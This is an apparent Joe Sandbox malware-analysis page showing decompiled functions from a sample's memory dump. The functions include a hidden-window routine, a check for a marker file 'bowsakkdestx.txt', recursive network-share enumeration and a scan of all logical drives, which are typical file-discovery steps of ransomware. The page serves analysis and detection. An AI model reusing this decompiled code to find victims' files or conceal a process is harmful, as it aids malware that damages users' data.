Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD

Uniqueness

Uniqueness Score: -1.00%

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00462FF0(intOrPtr* _a4, void _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				signed int _t11;
				signed int _t14;
				intOrPtr* _t15;
				void* _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t33;
				intOrPtr* _t34;
				void* _t36;
				void* _t40;
				void* _t41;

				_t28 = _a16;
				if(_t28 == 0) {
					_t10 = E0047D440();
					_t38 = _a12;
					__eflags = _t10;
					_t24 = _a8;
					_t33 = _a4;
					_t31 =  !=  ? _t10 : "Enter PEM pass phrase:";
					_t11 = E0047D480(_t28, _a12, _t33, 4, _a8,  !=  ? _t10 : "Enter PEM pass phrase:", _a12, _t29);
					_t41 = _t40 + 0x14;
					__eflags = _t11;
					if(__eflags != 0) {
						L9:
						E004512D0(_t24, _t28, _t31, _t38, __eflags, 9, 0x64, 0x6d, ".\\crypto\\pem\\pem_lib.c", 0x6f);
						_t14 = E0042B420(_t33, 0, _t24) | 0xffffffff;
						__eflags = _t14;
					} else {
						do {
							_t15 = _t33;
							_t28 = _t15 + 1;
							do {
								_t26 =  *_t15;
								_t15 = _t15 + 1;
								__eflags = _t26;
							} while (_t26 != 0);
							_t14 = _t15 - _t28;
							__eflags = _t14 - 4;
							if(__eflags < 0) {
								goto L8;
							}
							goto L10;
							L8:
							_push(4);
							_push("phrase is too short, needs to be at least %d chars\n");
							_t16 = E00420E4D();
							E00422408(_t24, _t31, _t33, __eflags);
							_t19 = E0047D480(_t28, _t38, _t33, 4, _t24, _t31, _t38, _t16 + 0x40);
							_t41 = _t41 + 0x20;
							__eflags = _t19;
						} while (__eflags == 0);
						goto L9;
					}
					L10:
					return _t14;
				} else {
					_t34 = _t28;
					_t27 = _t34 + 1;
					do {
						_t20 =  *_t34;
						_t34 = _t34 + 1;
					} while (_t20 != 0);
					_t36 =  >  ? _a8 : _t34 - _t27;
					E0042D8D0(_a4, _t28, _t36);
					return _t36;
				}
			}

0x00462ff0
0x00462ff7
0x00463027
0x0046302c
0x00463030
0x00463032
0x0046303b
0x0046303f
0x00463048
0x0046304d
0x00463050
0x00463052
0x00463095
0x004630a2
0x004630b3
0x004630b3
0x00463054
0x00463054
0x00463054
0x00463056
0x00463060
0x00463060
0x00463062
0x00463063
0x00463063
0x00463067
0x00463069
0x0046306c
0x00000000
0x00000000
0x00000000
0x0046306e
0x0046306e
0x00463070
0x00463075
0x0046307e
0x00463089
0x0046308e
0x00463091
0x00463091
0x00000000
0x00463054
0x004630b6
0x004630ba
0x00462ff9
0x00462ff9
0x00462ffb
0x00463000
0x00463000
0x00463002
0x00463003
0x0046300d
0x00463018
0x00463023
0x00463023

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

phrase is too short, needs to be at least %d chars, xrefs: 00463070
.\crypto\pem\pem_lib.c, xrefs: 00463097
Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C500(void* __ecx, void* __edx) {
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t10;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t27;

				_t21 = __edx;
				_t4 =  &_v264;
				_t19 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t27 = E004220B6( &_v264, "r");
					__eflags = _t27;
					if(__eflags != 0) {
						_push(_t22);
						_push(2);
						_push(0);
						_push(_t27);
						E0042387F(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t10 = E00423455(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t23 = _t10;
						E00420CF4(_t19, _t21, _t23, _t27, __eflags);
						__eflags = _t23;
						if(__eflags == 0) {
							L7:
							_push(_t27);
							E00423A38(_t19, _t23, _t27, __eflags);
							__eflags = 0;
							return 0;
						} else {
							__eflags = _t23 - 0x400;
							if(__eflags > 0) {
								goto L7;
							} else {
								E004222F5(_t19, 1, _t23, _t27);
								_push(_t27);
								E00423A38(_t19, _t23, _t27, __eflags);
								return 1;
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c500
0x0040c509
0x0040c519
0x0040c51b
0x0040c523
0x0040c539
0x0040c550
0x0040c555
0x0040c557
0x0040c561
0x0040c562
0x0040c564
0x0040c566
0x0040c567
0x0040c56c
0x0040c56d
0x0040c572
0x0040c573
0x0040c575
0x0040c57d
0x0040c57f
0x0040c5a5
0x0040c5a5
0x0040c5a6
0x0040c5ae
0x0040c5b6
0x0040c581
0x0040c581
0x0040c587
0x00000000
0x0040c589
0x0040c58e
0x0040c593
0x0040c594
0x0040c5a4
0x0040c5a4
0x0040c587
0x0040c559
0x0040c55a
0x0040c560
0x0040c560
0x0040c525
0x0040c52b
0x0040c52b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA80(struct HINSTANCE__* __ecx) {
				struct HWND__* _t1;
				struct HWND__* _t6;

				 *0x513244 = __ecx;
				_t1 = CreateWindowExW(0, L"LPCWSTRszWindowClass", L"LPCWSTRszTitle", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __ecx, 0);
				_t6 = _t1;
				if(_t6 != 0) {
					ShowWindow(_t6, 0);
					UpdateWindow(_t6);
					 *0x51323c = _t6;
					return 1;
				} else {
					return _t1;
				}
			}

0x0041baa7
0x0041baad
0x0041bab3
0x0041bab7
0x0041babe
0x0041bac5
0x0041bacb
0x0041bad7
0x0041baba
0x0041baba
0x0041baba

APIs

CreateWindowExW.USER32 ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszWindowClass, xrefs: 0041BAA0
LPCWSTRszTitle, xrefs: 0041BA9B

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234
sharememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00410BD0(struct _NETRESOURCE* __ecx, intOrPtr* __edx) {
				char _v8;
				signed int _v16;
				intOrPtr _v24;
				signed int _v28;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v92;
				intOrPtr _v96;
				int _v100;
				char _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				void* _v144;
				struct _NETRESOURCE* _v148;
				signed int _v152;
				void* _v156;
				int _v160;
				int _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t88;
				signed int _t89;
				signed int _t91;
				intOrPtr _t103;
				void* _t107;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				void* _t122;
				signed int _t124;
				signed int _t127;
				struct _NETRESOURCE* _t129;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t161;
				intOrPtr* _t164;
				signed int _t167;
				signed int _t168;
				void* _t169;

				_t129 = __ecx;
				_t168 = _t167 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cabd6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				_t169 = _t168 - 0x98;
				_v164 = 0x4000;
				_t164 = __edx;
				_v160 = 0xffffffff;
				if(WNetOpenEnumW(2, 0, 0, __ecx,  &_v156) == 0) {
					_t122 = GlobalAlloc(0x40, _v164);
					_v144 = _t122;
					while(1) {
						E0042B420(_t122, 0, _v164);
						_t169 = _t169 + 0xc;
						_t88 = WNetEnumResourceW(_v156,  &_v160, _t122,  &_v164);
						__eflags = _t88;
						if(_t88 != 0) {
							break;
						}
						_v148 = _t88;
						__eflags = _v160 - _t88;
						if(_v160 > _t88) {
							_t124 = _t122 + 0x10;
							__eflags = _t124;
							_v152 = _t124;
							do {
								_v96 = 7;
								_v100 = 0;
								_v116 = 0;
								_v72 = 7;
								_v76 = 0;
								_v92 = 0;
								_v48 = 7;
								_v52 = 0;
								_v68 = 0;
								_v24 = 7;
								_v28 = 0;
								_v44 = 0;
								_v8 = 0;
								_t151 =  *_t124;
								_v132 =  *((intOrPtr*)(_t124 - 0x10));
								_v128 =  *((intOrPtr*)(_t124 - 0xc));
								_v124 =  *((intOrPtr*)(_t124 - 8));
								_v120 =  *(_t124 - 4);
								__eflags = _t151;
								if(_t151 != 0) {
									__eflags =  *_t151;
									if( *_t151 != 0) {
										_t146 = _t151;
										_t161 = _t146 + 2;
										do {
											_t118 =  *_t146;
											_t146 = _t146 + 2;
											__eflags = _t118;
										} while (_t118 != 0);
										_t147 = _t146 - _t161;
										__eflags = _t147;
										_t148 = _t147 >> 1;
									} else {
										_t148 = 0;
									}
									_push(_t148);
									_t129 =  &_v116;
									E00415C10(_t124, _t129, _t161, _t164, _t151);
								}
								_t152 =  *(_t124 + 4);
								__eflags = _t152;
								if(_t152 != 0) {
									__eflags =  *_t152;
									if( *_t152 != 0) {
										_t143 = _t152;
										_t38 = _t143 + 2; // 0x72
										_t161 = _t38;
										do {
											_t116 =  *_t143;
											_t143 = _t143 + 2;
											__eflags = _t116;
										} while (_t116 != 0);
										_t144 = _t143 - _t161;
										__eflags = _t144;
										_t145 = _t144 >> 1;
									} else {
										_t145 = 0;
									}
									_push(_t145);
									_t129 =  &_v92;
									E00415C10(_t124, _t129, _t161, _t164, _t152);
								}
								_t153 =  *(_t124 + 8);
								__eflags = _t153;
								if(_t153 != 0) {
									__eflags =  *_t153;
									if( *_t153 != 0) {
										_t140 = _t153;
										_t161 = _t140 + 2;
										do {
											_t114 =  *_t140;
											_t140 = _t140 + 2;
											__eflags = _t114;
										} while (_t114 != 0);
										_t141 = _t140 - _t161;
										__eflags = _t141;
										_t142 = _t141 >> 1;
									} else {
										_t142 = 0;
									}
									_push(_t142);
									_t129 =  &_v68;
									E00415C10(_t124, _t129, _t161, _t164, _t153);
								}
								_t154 =  *(_t124 + 0xc);
								__eflags = _t154;
								if(_t154 != 0) {
									__eflags =  *_t154;
									if( *_t154 != 0) {
										_t110 = _t154;
										_t161 = _t110 + 2;
										do {
											_t139 =  *_t110;
											_t110 = _t110 + 2;
											__eflags = _t139;
										} while (_t139 != 0);
										_t111 = _t110 - _t161;
										__eflags = _t111;
										_t112 = _t111 >> 1;
									} else {
										_t112 = 0;
									}
									_push(_t112);
									_t129 =  &_v44;
									E00415C10(_t124, _t129, _t161, _t164, _t154);
								}
								_t161 =  *(_t164 + 4);
								__eflags =  &_v132 - _t161;
								if( &_v132 >= _t161) {
									L41:
									__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
									if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
										_push(_t129);
										E004150C0(_t124, _t164, _t161, _t164);
									}
									_t131 =  *(_t164 + 4);
									_v140 = _t131;
									_v136 = _t131;
									_v8 = 2;
									__eflags = _t131;
									if(__eflags != 0) {
										E00418FD0(_t131, __eflags,  &_v132);
									}
								} else {
									_t103 =  *_t164;
									_t129 =  &_v132;
									__eflags = _t103 - _t129;
									if(_t103 > _t129) {
										goto L41;
									} else {
										_t135 = _t129 - _t103;
										_t127 = ((0x92492493 * _t135 >> 0x20) + _t135 >> 6 >> 0x1f) + ((0x92492493 * _t135 >> 0x20) + _t135 >> 6);
										__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
										if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
											_push(_t135);
											E004150C0(_t127, _t164, _t161, _t164);
										}
										_t136 =  *(_t164 + 4);
										_v136 = _t136;
										_v140 = _t136;
										_t107 = _t127 * 0x70 +  *_t164;
										_v8 = 1;
										__eflags = _t136;
										if(__eflags != 0) {
											E00418FD0(_t136, __eflags, _t107);
										}
										_t124 = _v152;
									}
								}
								_v8 = 0;
								 *(_t164 + 4) =  *(_t164 + 4) + 0x70;
								__eflags =  *(_t124 - 4) & 0x00000002;
								if(( *(_t124 - 4) & 0x00000002) != 0) {
									_t71 = _t124 - 0x10; // -16
									E00410BD0(_t71, _t164);
								}
								_v8 = 0xffffffff;
								E00410F20( &_v132);
								_t124 = _t124 + 0x20;
								_t129 = _v148 + 1;
								_v152 = _t124;
								_v148 = _t129;
								__eflags = _t129 - _v160;
							} while (_t129 < _v160);
							_t122 = _v144;
						}
					}
					_t89 = WNetCloseEnum(_v156);
					asm("sbb eax, eax");
					 *[fs:0x0] = _v16;
					_t91 =  ~_t89 + 1;
					__eflags = _t91;
					return _t91;
				} else {
					 *[fs:0x0] = _v16;
					return 0;
				}
			}

0x00410bd0
0x00410bd3
0x00410bd6
0x00410bd8
0x00410be3
0x00410be4
0x00410beb
0x00410bf8
0x00410c08
0x00410c0a
0x00410c1a
0x00410c3f
0x00410c41
0x00410c45
0x00410c4c
0x00410c51
0x00410c63
0x00410c69
0x00410c6b
0x00000000
0x00000000
0x00410c71
0x00410c75
0x00410c79
0x00410c7b
0x00410c7b
0x00410c7e
0x00410c82
0x00410c84
0x00410c8c
0x00410c94
0x00410c99
0x00410ca1
0x00410ca5
0x00410caa
0x00410cb5
0x00410cbc
0x00410cc1
0x00410ccc
0x00410cd3
0x00410cdb
0x00410ce5
0x00410ce7
0x00410cee
0x00410cf5
0x00410cfc
0x00410d00
0x00410d02
0x00410d04
0x00410d08
0x00410d0e
0x00410d10
0x00410d13
0x00410d13
0x00410d16
0x00410d19
0x00410d19
0x00410d1e
0x00410d1e
0x00410d20
0x00410d0a
0x00410d0a
0x00410d0a
0x00410d22
0x00410d24
0x00410d28
0x00410d28
0x00410d2d
0x00410d30
0x00410d32
0x00410d34
0x00410d38
0x00410d3e
0x00410d40
0x00410d40
0x00410d43
0x00410d43
0x00410d46
0x00410d49
0x00410d49
0x00410d4e
0x00410d4e
0x00410d50
0x00410d3a
0x00410d3a
0x00410d3a
0x00410d52
0x00410d54
0x00410d58
0x00410d58
0x00410d5d
0x00410d60
0x00410d62
0x00410d64
0x00410d68
0x00410d6e
0x00410d70
0x00410d73
0x00410d73
0x00410d76
0x00410d79
0x00410d79
0x00410d7e
0x00410d7e
0x00410d80
0x00410d6a
0x00410d6a
0x00410d6a
0x00410d82
0x00410d84
0x00410d88
0x00410d88
0x00410d8d
0x00410d90
0x00410d92
0x00410d94
0x00410d98
0x00410d9e
0x00410da0
0x00410da3
0x00410da3
0x00410da6
0x00410da9
0x00410da9
0x00410dae
0x00410dae
0x00410db0
0x00410d9a
0x00410d9a
0x00410d9a
0x00410db2
0x00410db4
0x00410dbb
0x00410dbb
0x00410dc0
0x00410dc7
0x00410dc9
0x00410e1f
0x00410e1f
0x00410e22
0x00410e24
0x00410e27
0x00410e27
0x00410e2c
0x00410e2f
0x00410e33
0x00410e37
0x00410e3f
0x00410e41
0x00410e48
0x00410e48
0x00410dcb
0x00410dcb
0x00410dcd
0x00410dd1
0x00410dd3
0x00000000
0x00410dd5
0x00410dd5
0x00410de8
0x00410dea
0x00410ded
0x00410def
0x00410df2
0x00410df2
0x00410df7
0x00410dfd
0x00410e01
0x00410e05
0x00410e07
0x00410e0f
0x00410e11
0x00410e14
0x00410e14
0x00410e19
0x00410e19
0x00410dd3
0x00410e4d
0x00410e55
0x00410e59
0x00410e60
0x00410e64
0x00410e67
0x00410e67
0x00410e70
0x00410e7b
0x00410e84
0x00410e87
0x00410e88
0x00410e8c
0x00410e90
0x00410e90
0x00410e9a
0x00410e9a
0x00410c79
0x00410ea7
0x00410eb7
0x00410eb9
0x00410ec1
0x00410ec1
0x00410ec6
0x00410c1c
0x00410c25
0x00410c32
0x00410c32

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00410A50(char __ecx) {
				signed int _v16;
				char _v28;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				void* _v60;
				char _v64;
				char _v68;
				char _v76;
				unsigned int _v80;
				char _v84;
				unsigned int _v88;
				char _v89;
				intOrPtr _v96;
				intOrPtr _v101;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t35;
				int _t39;
				int _t40;
				int _t45;
				void* _t48;
				signed int _t52;
				char* _t63;
				signed int _t74;
				signed int _t75;
				void* _t76;
				char* _t77;

				_t75 = _t74 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cab90);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t75;
				_t76 = _t75 - 0x48;
				_push(_t72);
				_push(_t70);
				_v76 = __ecx;
				_t35 = GetLogicalDrives();
				_v80 = _t35;
				_t52 = 0;
				do {
					if((_t35 >> _t52 & 0x00000001) == 0) {
						goto L11;
					}
					_push(1);
					_v48 = 0xf;
					_v52 = 0;
					_v68 = 0;
					E004156D0(_t52,  &_v68, _t70, " ");
					_v16 = 0;
					_t10 = _t52 + 0x41; // 0x41
					_push(2);
					_t59 =  >=  ? _v76 :  &_v76;
					 *( >=  ? _v76 :  &_v76) = _t10;
					E00413EA0(_t52,  &_v76, _t70, _t72, ":\\");
					_t39 = SetErrorMode(1);
					_t70 = _t39;
					_t62 =  >=  ? _v84 :  &_v84;
					_t40 = PathFileExistsA( >=  ? _v84 :  &_v84);
					_t72 = _t40;
					SetErrorMode(_t39);
					if(_t40 != 0) {
						_t44 =  >=  ? _v76 :  &_v76;
						_t45 = GetDriveTypeA( >=  ? _v76 :  &_v76);
						if(_t45 >= 2 && (_t45 <= 4 || _t45 == 6)) {
							_t77 = _t76 - 0x18;
							_v89 = 0;
							_t63 = _t77;
							_push(0xffffffff);
							 *((intOrPtr*)(_t63 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t63 + 0x10)) = 0;
							 *_t63 = 0;
							E00413FF0(_t52, _t63,  &_v76, 0);
							_t48 = E00412900( &_v64, _v101);
							_t76 = _t77 + 0x18;
							_v28 = 1;
							E00413580(_t52, _v96, _t48);
							if(_v48 >= 8) {
								L00422587(_v56);
								_t76 = _t76 + 4;
							}
						}
					}
					_v16 = 0xffffffff;
					if(_v56 >= 0x10) {
						L00422587(_v76);
						_t76 = _t76 + 4;
					}
					_t35 = _v88;
					L11:
					_t52 = _t52 + 1;
				} while (_t52 < 0x1a);
				 *[fs:0x0] = _v16;
				return _t35;
			}

0x00410a53
0x00410a56
0x00410a58
0x00410a63
0x00410a64
0x00410a6b
0x00410a6f
0x00410a70
0x00410a71
0x00410a75
0x00410a7b
0x00410a7f
0x00410a81
0x00410a8a
0x00000000
0x00000000
0x00410a90
0x00410a9b
0x00410aa3
0x00410aab
0x00410ab0
0x00410ab5
0x00410ac6
0x00410ac9
0x00410acb
0x00410ad5
0x00410adb
0x00410ae2
0x00410af1
0x00410af3
0x00410af9
0x00410b00
0x00410b02
0x00410b0a
0x00410b15
0x00410b1b
0x00410b24
0x00410b30
0x00410b33
0x00410b38
0x00410b3e
0x00410b42
0x00410b49
0x00410b51
0x00410b54
0x00410b61
0x00410b66
0x00410b6e
0x00410b73
0x00410b7d
0x00410b83
0x00410b88
0x00410b88
0x00410b7d
0x00410b24
0x00410b8b
0x00410b98
0x00410b9e
0x00410ba3
0x00410ba3
0x00410ba6
0x00410baa
0x00410baa
0x00410bab
0x00410bba
0x00410bc5

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 83c283a83e3b6ec64f5d0c5989118488c3e7ded4ed41135c2216c27b25e3ace2
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 83c283a83e3b6ec64f5d0c5989118488c3e7ded4ed41135c2216c27b25e3ace2
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0043B6FF(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x510440, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x510ab0 - _t7;
								if(__eflags == 0) {
									_t9 = E00425208(__eflags);
									 *_t9 = E00425261(GetLastError());
									goto L17;
								} else {
									__eflags = E0042793D(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00425208(__eflags);
										 *_t12 = E00425261(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0042793D(_t6, _t31);
						 *((intOrPtr*)(E00425208(__eflags))) = 0xc;
						goto L12;
					} else {
						E00420BED(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00420C62(__ebx, __edx, __edi, _a8);
				}
			}

0x0043b706
0x0043b714
0x0043b717
0x0043b719
0x0043b728
0x0043b75b
0x0043b75b
0x0043b75e
0x00000000
0x00000000
0x0043b72b
0x0043b72d
0x0043b72f
0x0043b72f
0x0043b72f
0x0043b73c
0x0043b742
0x0043b744
0x0043b746
0x0043b7a6
0x0043b7a6
0x0043b748
0x0043b748
0x0043b74e
0x0043b790
0x0043b7a4
0x00000000
0x0043b750
0x0043b757
0x0043b759
0x0043b778
0x0043b78c
0x0043b772
0x0043b772
0x0043b772
0x00000000
0x00000000
0x00000000
0x0043b759
0x0043b74e
0x00000000
0x0043b774
0x0043b761
0x0043b76c
0x00000000
0x0043b71b
0x0043b71e
0x0043b724
0x0043b724
0x0043b775
0x0043b777
0x0043b708
0x0043b712
0x0043b712

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

